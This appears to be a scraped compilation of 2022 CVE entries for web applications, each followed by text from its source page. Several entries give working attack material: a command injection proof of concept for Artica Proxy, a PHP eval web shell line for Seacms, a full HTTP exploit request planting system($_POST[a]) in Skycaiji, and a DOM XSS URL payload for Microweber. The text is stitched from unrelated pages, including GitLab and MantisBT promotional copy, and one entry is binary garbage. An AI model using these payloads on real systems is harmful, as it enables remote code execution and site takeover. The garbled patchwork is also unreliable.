In LibreHealth EHR 2.0.0, lack of sanitization of the GET parameters formseq and formid in interface\orders\find_order_popup.php leads to multiple cross-site scripting (XSS) vulnerabilities.

GitLab 15.0 is launching on May 22! This version brings many exciting improvements, but also removes deprecated features and introduces **breaking changes** that may impact your workflow. To see what is being deprecated and removed, please visit Breaking changes in 15.0 and Deprecations.

CVE-2022-29940: Tags · LibreHealth / LibreHealth EHR / LibreHealth EHR Base · GitLab

A OS Command Injection vulnerability was discovered in Artica Proxy 4.30.000000. Attackers can execute OS commands in cyrus.events.php with GET param logs and POST param rp.

**Vendor && Product**

www.articatech.com

Artica Web Proxy v4.30.000000

Download: http://www.articatech.com/download.php

**Reproduction**

Login the web account, use this poc

> _Because the execution result is not echoed, we view the result by writing a file_

https://192.168.108.14:9000/cyrus.events.php?logs=  
 ​  
 POST:  
 rp=;id>../1.txt;

access https://192.168.108.14:9000/1.txt, we can see the execution result.

**OS Command Injection Analysis**

The vulnerable file is in ： cyrus.events.php, it receives a parameter logs and execute function logs()

In the function logs(), it receives another parameter rp with POST method, then take them to the file cyrus.php with ?cyrus-events=yes

In cyrus.php, cyrus-events corresponds to cyrus_events() which can execute os command through ;

$cmdline="$grep --binary-files=text -Ei \\"$search\\" /var/log/mail.log|$tail -n $rp  >$logfile 2>&1";  
...  
shell\_exec($cmdline);

CVE-2021-41739: Artica Proxy 4.30 cyrus.events.php RCE - rootless - Medium

An arbitrary file upload vulnerability in Web@rchiv 1.0 allows attackers to execute arbitrary commands via a crafted PHP file.

**CVE-2021-39458****Arbitrary file upload vulnerability**

*   Vendor: zeitprax.com / blitzprax.com
*   Product: Web@rchiv
*   Version: 1.0

An arbitrary file upload vulnerability in Web@archiv 1.0 allows attackers to execute arbitrary commands via a malicious PHP file.

To exploit the vulnerabilty you have to upload a php file which contains the shell\_exec() function of php to execute local commands on the system. The Applications is intended for uploading documents but does not filter against extensions or anything else. By choosing the file it will be immediately uploaded and a direct hyperlink will be displayed.

**Generated hyperlink before submitting the actual file**

**Test for proper php code execution**

**Output of the command "id"**

**PoC PHP file**

CVE-2022-29347: MyOwnCVEs/CVE-2022-29347 at main · evildrummer/MyOwnCVEs

Seacms v11.6 was discovered to contain a remote command execution (RCE) vulnerability via the Mail Server Settings.

1、Log in to the background, click System and then click Mail Server Settings.Write code in any box in the box below, take phpinfo() as an example, you need to write {${phpinfo()}}, if you want to write a sentence Trojan, you can write ${@eval($\_POST\[ a\])} (it can also be successfully connected after testing).

2、Then refresh the page directly, or directly access /data/admin/smtp.php in the root path

CVE-2022-28076: seacms v11.6 Vulnerability Execution Command · Issue #1 · likCodinG/seacms_vul

A reflected cross-site scripting (XSS) vulnerability in the component Query.php of arPHP v3.6.0 allows attackers to execute arbitrary web scripts.

This blog will be updated with more information about the vulnerability and the exploitation once the CVE is assigned.

**Discovered by: Mohammed Fadhl Al-Barbari****CVE-ID : WaitListed****Vendor : https://www.ar-php.org/****Vulnerability type : Cross-Site Scripting****Verified on : arPHP 3.6.0****Description :**

Cross-Site Scripting vulnerability was found in arPHP examples. The affected script takes parameters without any filtration. an attacker could execute any JS code or inject an HTML page.

**POCs : Will be avaliable soon****Follow us:**

**Twitter**:  
Mohammed Al-Barbari

**LinkedIn**:  
Mohammed Al-Barbari

CVE-2022-28081: arPHP 3.6.0 - Reflected XSS

Poultry Farm Management System v1.0 was discovered to contain a SQL injection vulnerability via the Item parameter at /farm/store.php.

��h�S�5�?�s�?�md���W�9�,��\_���#A\\��l��\[��&���k+��7нu�=L ����(��$���{��������;8���4#�|@$�pm�naΆl3h@��W��S�:����x���d��&�ʣ�?�L��DO��8����{����yV �">VH7�Ȑ�oɇaD1p���Ұ^��fƶ�2�+v�y�k�ބ�|�zsPqa�A�-LW(�. 2Ħ�9�|M�jW�P'�6��fNF�#����<�4�����#� X�X�x��htG����IG�3S���麑Ե��6�j�����^��"pN4qv�T/�q���\]9Ջ�n��5qv�T/��q���ٍS͸� �J��Ug7N�x��ٍӿp��u6h ��<�� K�#���,� �/�$�w������=�OD�1���C+��DB�knyg� ��\`?���")�I�hL '��1I�D�����YC"��>e�)�8)��������H��e�?h8�co>��p�uy�Ȋ%��Q\_ņ�&�Q+��A�gƼe+5X^m�DnIkԄ�/����Ȝ�\[�gr��L\[�C�՛�q1+������q9��6&�D����\[�Ve��n��3���/\[4����+�d�F\`ꀺ�Y"���T��\* �v�m�d\`Z�uey�ڈ)�5���UR^�ܽs?3�3x��v�tB�;� �a=�|\]C��U��'�������v%���볥ҕ�5�r+&sр�-��~|ހj���YW3!ɵ�RgkqM�a(�iWS�TH�k��Mt�Lu--���\\�"�5����M��ͬ��Tڨ�CL}0��t �� EW�e��Ǖv1����b �����\[�O��x��H\_����m�L0��z1�z��b�����b�׸�d�;�G�bU�К��|{��7�9����0����MCo ~�#~���h�lU�y j����z�ii���>�U{��1k=\`s��ۢ���{���:Y�ל��|�3����Z\_�GO:��YFØ�Q��)�ۥm��� �@�!}���g,ds�

CVE-2022-28099

An XSS issue was discovered in browser_search_plugin.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.

**MantisBT makes collaboration with team members & clients easy, fast, and professional**

MantisBT is an open source issue tracker that provides a delicate balance between simplicity and power. Users are able to get started in minutes and start managing their projects while collaborating with their teammates and clients effectively. Once you start using it, you will never go back!

**Email Notifications**

Keep your team and clients updated with notifications on issue updates, resolution, or comments.

**Access Control**

Per project role based access control for users putting you in control of your business.

**Customizable**

Flexibility to customize your issue fields, notifications and workflow.

**Words from our users**

  

"We've come to respect mantis for its powerful simplicity and I go around recommending it to friends and clients alike."

John Zastrow / Tetra Tech, Inc.

"Great product! We tried 6 different issue trackers before settling on Mantis."

John Locke / Freelock Computing

"Very flexible great project, exactly what we need for our software development."

Attila Strba / EnOcean

**Try MantisBT Now!**

It's never been easier to evaluate MantisBT. You can start by one or more of the demo options we have available or just go directly to the downloads page and get the latest version along with the administrator's guide to setup on your own servers.

CVE-2022-28508: Mantis Bug Tracker

Skycaiji v2.4 was discovered to contain a remote code execution (RCE) vulnerability via /SkycaijiApp/admin/controller/Develop.php.

**Vulnerability conditions**

*   Website Admin permissions

**Vulnerability details**

Location: /SkycaijiApp/admin/controller/Develop.php#L707#funcAction()

Code:

    ...
    else{
    				
    				$module=input('module');
    				$copyright=input('copyright');
    				$identifier=input('identifier');
    				$name=input('name');
    				$methods=input('methods/a',array());
    				
    				if(empty($module)){
    					$this->error('请选择类型');
    				}
    				
    				$module=$mfuncApp->format_module($module);
    				$copyright=$mfuncApp->format_copyright($copyright);
    				$identifier=$mfuncApp->format_identifier($identifier);
    				
    				if(!$mfuncApp->right_module($module)){
    					$this->error('类型错误');
    				}
    				if(!$mfuncApp->right_identifier($identifier)){
    					$this->error('功能标识只能由字母或数字组成，且首个字符必须是字母！');
    				}
    				if(!$mfuncApp->right_copyright($copyright)){
    					$this->error('作者版权只能由字母或数字组成，且首个字符必须是字母！');
    				}
    				
    				$newMethods=array();
    				foreach ($methods['method'] as $k=>$v){
    					if(preg_match('/^[a-z\_]\w*/',$v)){
    						
    						foreach ($methods as $mk=>$mv){
    							
    							$newMethods[$mk][$k]=$mv[$k];
    						}
    					}
    				}
    				$methods=$newMethods;
    				unset($newMethods);
    				
    				if(empty($methods['method'])){
    					$this->error('请添加方法！');
    				}
    				
    				$app=$mfuncApp->app_name($copyright,$identifier);
    				
    				$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
    				
    				if($id>0){
    					$this->success('创建成功','Develop/func?app='.$app);
    				}else{
    					$this->error('创建失败');
    				}
    			}
    		}
    ....
    

Vulnerability key code:

    $app=$mfuncApp->app_name($copyright,$identifier);
    $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));`
    

�  
follow up $mfuncApp->app\_name  
  
Concatenate $copyright, $identifier directly, then return.  
Go back to $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));

follow up $mfuncApp->createApp

$module,$app,array('name'=>$name,'methods'=>$methods)

And the parameters we can control,follow up  
$funcFile=$this->filename($module,$app);  

Return directly after splicing

Continue back to the createApp function  

There is no filter /\* and \*/ for variables $name  
/plugin/func/$module/$copyright$identifier.php

Exp is constructed directly here:

    POST /index.php?s=/Admin/Develop/func HTTP/1.1
    Host: 172.16.49.3:50004
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 179
    Origin: http://172.16.49.3:50004
    Connection: close
    Referer: http://172.16.49.3:50004/index.php?s=/admin/Develop/func
    Cookie: PHPSESSID=o7c4tlckirjijmciq20ivi0cv4; login_history=3%7C6a03060e5e6600124dab098dfed314df
    
    _usertoken_=94701bbd27956c7d922c079da883c68f&module=downloadImg&name=*/system($_POST[a]);/*&identifier=a11&copyright=b1&methods%5Bmethod%5D%5B%5D=a12&methods%5Bcomment%5D%5B%5D=11
    

  
check the file  

Visit /plugin/func/downloadImg/A11B1.php  
post: a=command

CVE-2022-28096: Remote code execution vulnerability in /SkycaijiApp/admin/controller/Develop.php · Issue #39 · zorlan/skycaiji

DOM XSS in microweber ver 1.2.15 in GitHub repository microweber/microweber prior to 1.2.16. inject arbitrary js code, deface website, steal cookie...

**Description**

Hi there, on your latest version docker images 3463db62a01f, vulnerable to DOM XSS.

**Proof of Concept**

    http://localhost/admin/order?filteringResults=true&id=1&isPaid=1&keyword=1&maxDate=01/01/1967&maxPrice=1&minDate=01/01/1967&minPrice=1&orderStatus=new&productId=the&productKeyword=the9958%22%0a%09%09%09%09});%0a%09%09%09});%0a%09%09alert(origin);%0a%09%09%09$(document).ready(function%20()%20{%0a%09%09%09%09var%20searchOrdersByProduct%20=%20new%20mw.autoComplete({%0a//
    

 

**Impact**

inject arbitrary js code, deface website, steal cookie...

**Occurrences**

order\_filtering.blade.php L157

DOM code

    $(document).ready(function () {
                    var searchOrdersByProduct = new mw.autoComplete({
                        element: "#js-orders-search-by-products",
                        placeholder: "<?php if ($productKeyword) { echo $productKeyword; } else { _e("Search by products..."); }?>",
                        autoComplete:true,
                        ajaxConfig: {
                            method: 'get',
                            url: mw.settings.api_url + 'get_content_admin?get_extra_data=1&content_type=product&keyword=${val}'
                        },
                        map: {
                            value: 'id',
                            title: 'title',
                            image: 'picture'
                        }
                    });
                    $(searchOrdersByProduct).on("change", function (e, val) {
                        $(".js-orders-search-product").val(val[0].id).trigger('change')
                        $(".js-orders-search-product-keyword").val(val[0].title).trigger('change')
                    });
                });

CVE-2022-1555: DOM XSS in microweber ver 1.2.15  in microweber

Fusionpbx v4.4 and below contains a command injection vulnerability via the download email logs function.

@@ -198,129 +198,7 @@ public function resend($records) { } }  
/\*\* \* download records \*/ public function download($records) { if (permission\_exists($this\->permission\_prefix.'download')) {  
//add multi-lingual support $language = new text; $text = $language\->get();  
//validate the token $token = new token; if (!$token\->validate('/app/email\_logs/email\_logs.php')) { message::add($text\['message-invalid\_token'\],'negative'); header('Location: '.$this\->list\_page); exit; }  
//download multiple records (eventually zip individual emails together) if (is\_array($records) && @sizeof($records) != 0) {  
//retrieve checked records foreach($records as $x => $record) { if ($record\['checked'\] == 'true' && is\_uuid($record\['uuid'\])) { $uuids\[\] = $record\['uuid'\]; } }  
//download emails if (is\_array($uuids) && @sizeof($uuids) != 0) { foreach ($uuids as $x => $uuid) {  
//get email details $sql = "select call\_uuid, sent\_date, type, email from v\_email\_logs "; $sql .= "where email\_log\_uuid = :email\_log\_uuid "; $parameters\['email\_log\_uuid'\] = $uuid; $database = new database; $row = $database\->select($sql, $parameters, 'row'); if (is\_array($row) && @sizeof($row) != 0 && is\_uuid($row\['call\_uuid'\])) {  
//santize filename components $sent\_date = str\_replace('-','', $row\['sent\_date'\]); $sent\_date = str\_replace(':','', $sent\_date); $sent\_date = str\_replace(' ','\_', $sent\_date); $type = strtolower($row\['type'\]); $email\_filename = $sent\_date.'\_'.$type.'\_'.$row\['call\_uuid'\].'.eml';  
//single email if (@sizeof($uuids) == 1) {  
//set headers header("Content-Type: message/rfc822"); header('Content-Disposition: attachment; filename="'.$email\_filename.'"'); header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1 header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); // Date in the past header("Content-Length: ".strlen($row\['email'\]));  
//output content echo $row\['email'\]; exit; }  
//multiple emails else { if (is\_dir($\_SESSION\['server'\]\['temp'\]\['dir'\])) {  
if (file\_put\_contents($\_SESSION\['server'\]\['temp'\]\['dir'\].'/'.$email\_filename, $row\['email'\])) { $email\_files\[\] = $\_SESSION\['server'\]\['temp'\]\['dir'\].'/'.$email\_filename; } } }  
} unset($sql, $parameters, $row); }  
//download compressed file if (@sizeof($email\_files) != 0) {  
//define compressed file name $compressed\_filename = 'emails\_'.date('Ymd\_His').'.zip';  
//compress email files $command = 'zip -mj '.$\_SESSION\['server'\]\['temp'\]\['dir'\].'/'.$compressed\_filename.' '.implode(' ', $email\_files).' 2>&1'; exec($command, $response, $restore\_errlevel); unset($command);  
//push download if (file\_exists($\_SESSION\['server'\]\['temp'\]\['dir'\].'/'.$compressed\_filename)) {  
//open file session\_cache\_limiter('public'); $fd = fopen($\_SESSION\['server'\]\['temp'\]\['dir'\].'/'.$compressed\_filename, 'rb');  
//set headers header("Content-Type: application/zip"); header('Content-Disposition: attachment; filename="'.$compressed\_filename.'"'); header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1 header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); // Date in the past header("Content-Length: ".filesize($\_SESSION\['server'\]\['temp'\]\['dir'\].'/'.$compressed\_filename));  
//output file content ob\_clean(); fpassthru($fd); fclose($fd);  
//remove compressed file @unlink($\_SESSION\['server'\]\['temp'\]\['dir'\].'/'.$compressed\_filename); exit;  
}  
}  
}  
}  
}  
} //method  
} //class }  
?> ?>

Tag

#php